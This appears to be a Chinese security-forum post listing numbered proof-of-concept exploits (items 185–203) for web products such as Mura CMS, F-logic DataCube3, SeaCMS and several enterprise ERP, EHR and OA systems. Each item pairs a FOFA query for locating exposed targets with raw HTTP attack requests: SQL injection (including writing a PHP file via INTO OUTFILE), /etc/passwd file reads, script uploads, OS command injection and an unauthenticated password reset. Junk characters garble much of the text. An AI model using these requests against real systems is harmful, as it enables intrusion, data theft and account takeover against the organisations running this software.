' O8 N) ~1 t( A5 v& x/ k
$ I- D! W* U' b, ?6 x# e! H' C- z' M7 `/ w, b0 ?5 \3 w
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')/ x Y( G& r. H0 m
( }( I+ i% j, q5 i' H
N8 e! Z3 }; d185. 瑞友天翼应用虚拟化系统SQL注入' y1 q/ S$ S p! E! L* w4 s
version < 7.0.5.1
! g. _8 U3 y* l& s1 P3 KFOFA:app="REALOR-天翼应用虚拟化系统"
, Z7 K5 @9 t# W7 vGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
4 t! p" H3 Z( }* k# }Host: host& B! K7 F8 y, q; c* S
; _. X: _! v1 h3 n
$ ?$ W2 A- I0 X186. F-logic DataCube3 SQL注入% z( M! A/ ^4 B7 R9 j2 J* p
CVE-2024-317503 l. h" B* W/ h
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统' J9 J- n" V. B3 _& F! L
FOFA:title=="DataCube3": ?, W, S2 { F& T9 L- t& M0 I
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 b' S; w0 e6 U
Host: your-ip/ ?$ y/ H, P5 _; v! ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
5 Z) r5 x9 z0 G$ S) C; CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.86 K0 h: q. ?) ]% c2 Y5 S; }' V. x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ G3 d/ C% r$ {3 \1 a, y5 ~Accept-Encoding: gzip, deflate
& t/ e5 ^; z3 u4 B2 yConnection: close7 o6 O2 B7 ]! M+ g3 ~" ^
Content-Type: application/x-www-form-urlencoded
' W5 P. Z* q& p( Y
5 y( o# p b1 d6 ]& t: F6 o) Ureq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450. T( [4 d/ j3 { L1 a. a" P
9 g, X, g. m2 Y" R J* Z- z
; c# j U- g3 w3 _0 Q187. Mura CMS processAsyncObject SQL注入
& G6 o4 ] x k2 {CVE-2024-32640
! n; b6 `8 C# _$ e$ v& LFOFA:"Mura CMS"/ \2 m; i- A+ d/ n: y# r9 y. E
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.13 a9 e) O* O ~
Host: your-ip- ]$ h' o) r* I+ `
Content-Type: application/x-www-form-urlencoded
# V. d% b5 |1 l# O" ], y+ I- v% c1 P9 g7 |
! T* w& G9 U: K# q. R# J
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
N5 l( D. k- H. `; x! }7 [0 A( U0 d& Y: H6 l6 y- k
+ `( W( B, U- u& M& N/ C. b4 i188. 叁体-佳会视频会议 attachment 任意文件读取7 z9 E( S% s1 Z! C7 o
version <= 3.9.7
" A! q. |5 `5 \+ g& ?FOFA:body="/system/get_rtc_user_defined_info?site_id"
# g: E- `# c4 O" X" `GET /attachment?file=/etc/passwd HTTP/1.1; A+ S# w3 ~* j
Host: your-ip
5 h$ A: Z" Z- b0 L& W1 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% h* r0 ]2 x( H( _1 B7 n2 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 ?+ P/ h: v! b* l0 d$ RAccept-Encoding: gzip, deflate
! l) t1 ]6 n2 O3 A. j/ i% T+ VAccept-Language: zh-CN,zh;q=0.9,en;q=0.8* `2 m; S) e& T5 o
Connection: close/ b: G4 T! s* Z2 B* K4 {' v
! I- m3 [0 \$ q* ^1 W
; \' C8 R5 o8 X( u% U' U
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 D4 u0 z @2 b& cFOFA:app="LANWON-临床浏览系统"5 C: M5 \' }2 V# v, R
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1% b0 v: o" D' o+ ^: a
Host: your-ip2 O$ N/ N9 f3 V& u4 i6 V; I4 Y
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" ^ q. `( q t) d/ u: GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& ?. r8 H/ |' [. O7 l, n
Accept-Encoding: gzip, deflate1 b! [" `0 h# h; n( q/ L- v
Accept-Language: zh-CN,zh;q=0.9
5 }6 i9 X. t7 H. t. G+ K W4 N+ PConnection: close
5 O7 X6 ^9 [, o _1 q4 I$ z6 E5 j. N: X' P9 y5 W1 `/ @1 j/ T. C F
1 m+ S8 Q a# Y: I190. 短视频矩阵营销系统 poihuoqu 任意文件读取* W% v; i9 X; l0 j. Y
FOFA:title=="短视频矩阵营销系统"" |4 M, ^ Q1 g+ e$ n. U
POST /index.php/admin/Userinfo/poihuoqu HTTP/2! [4 s5 D% X: `0 d
Host: your-ip( W1 Q0 K" G' |8 z" l& ?" I$ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.363 {+ B H# _/ l: O$ t. J3 _9 p9 S" \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, |( X9 X+ V5 b" S7 BContent-Type: application/x-www-form-urlencoded& b; b+ e& B# j3 }- x( T* E- h
Accept-Encoding: gzip, deflate
# B1 d$ o, R& V, e& G. vAccept-Language: zh-CN,zh;q=0.93 I# k9 M) D9 C1 J; y; j
g5 c2 Z% N+ cpoi=file:///etc/passwd
3 ?% G" A/ `% _6 C7 ?" L% Y9 i* T4 X2 g( C- {1 G$ H- k! q! M
; R. K8 @5 a* I: Z. |191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
; ^. b& A# r j% j z& \3 nFOFA:body="/CDGServer3/index.jsp"
& o& k; z- t& n& w, y {POST /CDGServer3/js/../NavigationAjax HTTP/1.15 d5 H/ L0 F- h) O8 k
Host: your-ip. j7 X/ D, ?) z8 T* S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, I! ^$ Y0 C5 |- s5 WContent-Type: application/x-www-form-urlencoded
2 N. a. w. _" c/ }1 _6 h0 T1 G3 a; F: ?: {9 k s0 t
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=0 }$ ^) F: G% a# @
+ a+ Q! L0 `. X, @0 M! I) s* w
% V& j8 ]! B1 B6 G8 U4 P
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传( y' J/ A9 h, Y7 A- Y
FOFA:title="用户登录_富通天下外贸ERP"
% N: B$ b) k3 YPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
* @/ {7 } X9 U* u# N* CHost: your-ip h; q3 ~, {: i4 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
( L0 i! @# s a) gContent-Type: application/x-www-form-urlencoded
3 P" u; D9 [# \* y( k! @2 e
! I- {4 E% }, r; ^! y5 M7 _* L: V2 Y, H( l: Z) r$ i
<% @ webhandler language="C#" class="AverageHandler" %> W5 Z! X% `5 J' R& e8 |- ]5 S
using System;
, t& ] @, C9 R) g. ^using System.Web;( Y3 _: G8 n7 B
public class AverageHandler : IHttpHandler
/ r5 G* j( C9 y, e, T( a{3 s! p; V/ N0 n# f
public bool IsReusable$ n2 J# I- Z; Q! d4 V
{ get { return true; } }
4 Z/ q0 q* T4 n& lpublic void ProcessRequest(HttpContext ctx)$ q2 z/ h9 U$ z6 A2 j. P
{/ K6 S2 V8 N) z8 n4 n" F) I
ctx.Response.Write("test");4 [2 S$ z+ S+ }2 j
}# w1 O& `: {3 H3 Y
}, h& e% v) y9 _
. a. F& P6 F- _1 w/ \8 D
3 Q4 j$ e" l( N' |/ e2 g193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
( E& P* }" J. J0 `( u7 ?; O" dFOFA:body="山石云鉴主机安全管理系统"
* T6 F# ]! V6 }9 wGET /master/ajaxActions/getTokenAction.php HTTP/1.19 K, p3 e7 r$ T3 P- Q1 j6 s
Host:
6 C3 X8 X1 I6 vCookie: PHPSESSID=2333333333333;
: {/ j( g+ L& d. o4 W( t4 EContent-Type: application/x-www-form-urlencoded
U. a9 H! K3 ^# H0 eUser-Agent: Mozilla/5.09 v- `; f0 |1 y' h
! \+ I5 D, {$ t! f' e) V: h5 S7 ^1 K( d- [& ~ e) L; }
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1% k. O4 u" p$ v1 Y0 A* Q
Host:
1 ]6 [' J# a' j6 DUser-Agent: Mozilla/5.0$ z- \3 `, A: ^* D8 ~1 [
Accept-Encoding: gzip, deflate, H: t; s5 w4 F+ v. @! w
Accept: */*5 L4 I& l0 C* D- ]; w
Connection: close1 e& c* i8 C: a- i5 ~# E* p
Cookie: PHPSESSID=2333333333333;! U9 t6 a1 r+ u: W
Content-Type: application/x-www-form-urlencoded
" ]6 J9 R: |2 x ^Content-Length: 840 y a) B, f6 `, z
+ ^8 n, r0 d/ {. b3 Y+ I' fparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')3 `# D# a! T% F3 q4 a: q5 r( E+ r
+ i* k1 s/ q% E" m
# L, q6 s7 l# W9 k0 S7 @$ |GET /master/img/config HTTP/1.1
! U4 x3 [8 v" G# L. ?4 N7 B3 q' }Host:% [/ W8 L I/ B4 ?1 g8 t. S
User-Agent: Mozilla/5.0
. \3 _* J/ l7 o5 _$ T: j8 R- M6 k4 K
7 c6 I/ g- q6 ~ I2 {! R
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传 i. T2 R' E, I) X: O
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在. i: b9 G( w r# q6 I( H
0 f* @$ d K: Z# C \* [
POST /servlet/uploadAttachmentServlet HTTP/1.1 y* _0 z! \4 p2 M) C
Host: host
9 A4 m5 q/ _: z' o* ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.362 l+ E4 X, J5 V+ U% `% D0 k8 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 h0 q( H' }: f/ h& g) XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; h0 ~7 C- r( U7 ? n u
Accept-Encoding: gzip, deflate/ J1 i6 j" i! \( E4 a
Connection: close) k. [$ l3 H6 Z" I2 S/ Y+ M; _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk) C6 n- |* {) z6 c# G+ E, e" ]( n( \
------WebKitFormBoundaryKNt0t4vBe8cX9rZk1 e( V6 N( A5 z( `7 d
) s b5 P8 ^+ l# C- `Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
% C: v/ b! \' hContent-Type: text/plain
1 z4 S: K1 R8 X4 d5 A6 c<% out.println("hello");%>
: J1 S6 t% Q0 e' z! ~2 }2 I& I" {------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 G3 @, z; b( Z0 q# pContent-Disposition: form-data; name="json"
7 A, B3 _2 A6 k A; T& _ {"iq":{"query":{"UpdateType":"mail"}}}
' N Z M& R) K' \6 S7 P/ l8 ~------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
9 r1 W8 Y8 [0 `- o* ^* O2 N
. w- P7 K/ L0 W- I$ n3 V6 o
6 b+ U! D% T' m5 G" B6 N- i% {195. 飞鱼星上网行为管理系统 send_order.cgi命令执行) m! L0 m/ ~* B2 f) Q( S
FOFA:title=="飞鱼星企业级智能上网行为管理系统7 M8 o2 e! d, c5 a/ T
POST /send_order.cgi?parameter=operation HTTP/1.1/ a; b& @5 z0 v7 S9 ~
Host: 127.0.0.1
- J0 k% W R! q7 f% L- u- bPragma: no-cache
$ I8 F3 ~) \0 A( v# T: sCache-Control: no-cache
3 D/ N) I s# J5 B" ^! A+ r! P$ BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ Z# } z5 a$ a! U( R/ f% _2 T, G, RAccept: */*
1 ~3 ]. H" k/ fAccept-Encoding: gzip, deflate5 d7 ~' r, C& r5 }
Accept-Language: zh-CN,zh;q=0.9
6 F& p) G+ y V% sConnection: close R$ x; n( N1 q s/ _0 X: d
Content-Type: application/x-www-form-urlencoded8 T* E) {- h: T& X. e% R$ V- G
Content-Length: 68
0 f2 X; P* q: O) O& p( d
6 v+ f. G2 M( X+ G9 G, `; Y2 S0 h{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}) n4 T; J8 s4 [" K& ]
7 p4 ~: d: k$ D% B; _/ _9 g. T# p/ y
196. 河南省风速科技统一认证平台密码重置
. U1 w# C. w- u/ G3 B7 J5 W( wFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
, I$ a' w0 G4 L" F: Y7 q7 [- _6 ePOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
P. N1 I' `) C' T4 R+ z2 T) k( qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
3 o3 p" W& Q, I- v9 G2 @ NContent-Type: application/json;charset=UTF-8+ d3 e2 l2 M% y% r2 m0 S7 i9 D& k1 ]
X-Requested-With: XMLHttpRequest
) k& g8 Q. _( ?4 sHost:
. t6 U) Z1 } w! d" qAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
5 Q P) r% T9 M( \Content-Length: 45
/ {' l2 `& o4 Z5 i; q% c# d( T4 gConnection: close3 u/ i9 c( ], w9 x$ f: o s, l
6 }8 c& T. h6 }( Y0 f) v; x8 q R{"xgh":"test","newPass":"test666","email":""}2 x( O4 a0 B5 d, I( F
' f" s) P3 N) [- w e9 Q- w' C
2 f% I3 `3 R- n ?
?2 R7 _# c) K0 V' X197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入1 b( _: Y( |1 G0 N% n+ J2 D. H, a
FOFA:app="浙大恩特客户资源管理系统"
; O3 Y6 E% H% N9 o. F4 @: A# uGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
; E ?3 S0 z4 ?" e5 v F& `1 r! OHost:9 e) @9 x" I0 d m I" e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.361 Y+ s+ J) U! a& K3 x+ Q& s
Accept-Encoding: gzip, deflate
; A8 R. j s5 H, t: y% X! j" nConnection: close
% _! k% P8 p# I- k& \- f( k }9 M6 [9 W1 ]8 t1 G1 v9 s
( @1 L2 P, S4 C) J: A0 b# F) [
% w, ~2 A r- M$ m: L
198. 阿里云盘 WebDAV 命令注入- ^6 b& a$ Y" p5 c
CVE-2024-29640
, @) V# Q0 {2 l" v9 U' V- tGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
1 M0 I& k- s7 u3 W6 Y' gCookie: sysauth=41273cb2cffef0bb5d0653592624cf64' P# D. u( g& E8 J; I5 T& \
Accept: */*
% E& d/ c7 U# P ~# P c/ O3 H, LAccept-Encoding: gzip, deflate
0 t/ v: Y F! x1 N# ~1 EAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
! R) ^0 w2 g8 s4 @Connection: close; V) @ S3 q; y0 ?7 E8 Q2 C' f
) n) P/ T+ A: y! }. v7 n* |2 j! H0 h6 i5 s7 a2 O+ u, a& z
199. cockpit系统assetsmanager_upload接口 文件上传
$ x- H) l- B) N4 }! s' v; W. d+ ]0 Z) ?6 N. f% K% O
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
; T3 ~* x' b# YGET /auth/login?to=/ HTTP/1.1
5 R2 R5 d1 \" n3 v! \5 k" k! A7 Y8 j' b4 Z' N# T
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
' H. v6 p. D `2 l$ n2 u9 p g: U# F' u
2.使用刚才上一步获取到的jwt获取cookie:
0 Q% D: |" Q0 G q/ ]8 l6 f5 j l8 j9 z- N; P
POST /auth/check HTTP/1.1* a& \; B0 u3 e8 R1 Y3 ?# V% C
Content-Type: application/json
O; |4 W6 t, n# l0 E. y& I3 u5 j: h9 k" ^3 ] c
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}, H. x: p. _% S
, w# v- _: h! o响应:200,返回值:
& ~- H3 h$ M7 {Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/; V4 V' W9 N$ \
Fofa:title="Authenticate Please!"& d! D/ f5 [, Y. C- \- Y
POST /assetsmanager/upload HTTP/1.1
; Y. ]* I; K% J$ rContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3. l/ u# t8 h5 N+ G1 J. p) j
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
; P( W; Z- |! g! p4 H5 M5 i# f
9 H* ?1 v2 K1 b! l-----------------------------36D28FBc36bd6feE7Fb3
& H% @0 W/ l0 _, z5 XContent-Disposition: form-data; name="files[]"; filename="tttt.php"
, P, N# f H8 B. WContent-Type: text/php
) a) I7 n: `3 U, v M4 n/ J; N) T$ S/ A8 V& X4 e: G: Y$ j: c9 O
<?php echo "tttt";unlink(__FILE__);?>
: }2 [' _5 G y c2 ]9 {, G-----------------------------36D28FBc36bd6feE7Fb3* X, n k: h) \$ m* w: b0 M5 y+ _
Content-Disposition: form-data; name="folder"
1 }7 ]) B) k7 A1 \. v2 v
! L. M: P& T2 Y/ P$ T( g-----------------------------36D28FBc36bd6feE7Fb3--
- s% c t% e7 g3 q, X/ D/ X/ w/ W7 a. b3 n0 b
4 N* W, V; i& p: l/storage/uploads/tttt.php
; c7 \/ e# S7 ?! f- x- z) c& W9 T" O' S" @
200. SeaCMS海洋影视管理系统dmku SQL注入
8 F6 O& F1 m9 x7 j( ]FOFA:app="海洋CMS"
@' d7 D, T+ a4 |GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1( j. Y! R0 u1 Y; m
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
2 X$ R9 h/ e; ^, }/ ?4 BUpgrade-Insecure-Requests: 1
* C S7 f2 b7 \( D5 x& Y, o; n& ICache-Control: max-age=0
; }7 k0 I! S" z/ gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# [! i& f+ l& x/ J0 z0 z7 OAccept-Encoding: gzip, deflate" ~+ A1 }' R; a! T7 e
Accept-Language: zh-CN,zh;q=0.9
" T/ \: v& t2 A) c" S7 q3 t, L4 L/ e+ ] q" u, m/ u' z# l, u
4 R) P4 O5 ]7 D! L201. 方正全媒体新闻采编系统 binary SQL注入
' {) ]& z! r' X. fFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
$ h6 V3 M X3 C H0 Z: SPOST /newsedit/newsplan/task/binary.do HTTP/1.1% s% h) K0 b$ ?' I0 k! o
Content-Type: application/x-www-form-urlencoded
/ j$ Q2 E [- [' d; _ ^+ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 Q9 S S. @' N1 P
Accept-Encoding: gzip, deflate
' |1 Y# e6 O/ A* i- z) QAccept-Language: zh-CN,zh;q=0.97 v$ M. w, w- t4 F+ i9 {
Connection: close
) y& t# ?, J7 n
F+ A# a7 v5 D* yTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
' c. K U$ w: l9 F0 V. k- J& a+ \1 T. a" @4 n6 c
7 e$ V; V/ e! J( J9 e$ h9 N
202. 微擎系统 AccountEdit任意文件上传
$ Y/ K, v2 b! I8 D; WFOFA:body="/Widgets/WidgetCollection/"9 e: V# i7 @5 \) B/ N' u8 x# k
获取__VIEWSTATE和__EVENTVALIDATION值
$ ^# h9 B# n1 t1 Y3 e# j7 I! i4 uGET /User/AccountEdit.aspx HTTP/1.1) E& n8 B z. ]& ^/ H. U
Host: 滑板人之家; @+ f$ `% \- N& m( Q: Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
$ m6 `, t3 C* b9 PContent-Length: 0
2 T9 B1 I9 I L* }0 V* [$ g ?0 [9 O( V7 l9 W4 P' h7 ^, k2 M
, _9 M- I& E; M8 J) U替换__VIEWSTATE和__EVENTVALIDATION值
8 C: M: `1 V/ [! VPOST /User/AccountEdit.aspx HTTP/1.1
: a8 K( y2 x4 I* wAccept-Encoding: gzip, deflate, br! Z3 R% ?7 u# L* `( P
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
, b* I' j* R: B+ ]* ~8 }
0 Z6 H) `1 G8 \& P' G, k-----------------------------786435874t385875938657365873465673587356877 D! d8 w# ^% q5 c, _( R/ x
Content-Disposition: form-data; name="__VIEWSTATE"
2 K' U d, O( F" s- W4 [, x8 ]' T9 ~/ j5 D
__VIEWSTATE
0 h7 t; B+ N( t$ o/ I( x-----------------------------786435874t385875938657365873465673587356872 S/ @$ f" c$ W* X
Content-Disposition: form-data; name="__EVENTVALIDATION") D% a w9 o; O% v- I# r) f
9 j8 ?" g/ K% B+ ]$ p* c__EVENTVALIDATION* `1 |1 R" [1 S# ~$ g# F! Y7 y
-----------------------------786435874t38587593865736587346567358735687
7 ~! f0 n+ T% e% L6 R: ^) m; jContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"% m+ G. V( N7 [9 N. Z4 B
Content-Type: text/plain' f8 f( C& n: y7 ^% Z" [ n; z
1 B8 X) n) C9 w) ?$ H i7 R
Hello World!4 t5 `/ p3 d& n! r
-----------------------------786435874t38587593865736587346567358735687
: H- N0 O: P O5 j8 p9 R* FContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
! g& n, \" h; U+ D# r8 C3 V, k+ d5 ~, r1 T* q5 Q# M+ v \6 c# A
上传图片% _2 r3 L1 C$ {
-----------------------------786435874t38587593865736587346567358735687
, X% Z6 @% N9 _$ yContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
) t! D0 n: A8 q! F5 k; _/ M5 b4 [* N: ?, T
0 G: m8 ]0 q% p: Q8 w-----------------------------786435874t38587593865736587346567358735687. j2 _" T0 I: Z. n9 s, a
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail". b& L2 ^7 i! `- ?2 o
0 p& ~& D0 [ A6 u3 z& W
, G" ?4 Q/ P4 ^' D-----------------------------786435874t38587593865736587346567358735687--3 S! r6 V0 ^2 b3 P. V6 z W+ n
. p# K/ J) \/ g: z, R
% t! X+ I' f# M. ~/_data/Uploads/1123.txt9 n, b- X$ C8 }# N9 P# ^7 h
4 i5 m; H+ _) I" m
203. 红海云EHR PtFjk 文件上传" Y, l* [6 u% ~. c* D* x+ d
FOFA:body="RedseaPlatform"$ J9 W# D- Y9 }2 ?# u! q
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1$ k) U3 A& A" r, b; C: i: Y5 \. Y
Host: x.x.x.x- i' j1 {+ v! p3 D5 e; F
Accept-Encoding: gzip8 r% T# B Q5 I9 ]4 o9 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 A7 c- |: L, j4 [% l0 a i: yContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
' `+ T8 x! z0 b$ Z) K. |Content-Length: 2109 v, \3 [2 `8 b! b" f
8 j) W. _4 J7 X" j
------WebKitFormBoundaryt7WbDl1tXogoZys4
( q. ^) p- ^: u3 W2 d, b0 M8 KContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
/ V0 u8 Y# v; A4 vContent-Type:image/jpeg
+ A7 r1 R3 P/ p3 L/ _' f/ v- ^# ^: P& f1 c3 x H
<% out.print("hello,eHR");%>
! X% Z: v3 g5 c) _1 s% s9 }------WebKitFormBoundaryt7WbDl1tXogoZys4--
3 t: s* K/ L/ T; J) L' A8 a+ Z; g3 |& A% I* q$ e# C' ^2 S6 b% n; B
4 a& T, a" o8 i+ [. a( O: F, {
" x0 K! z6 q3 n7 Z; k9 k
( y, v- I! c' \* G
( J9 f/ C2 I" P
|
发表于 2024-6-5 14:31:29
收藏
支持
反对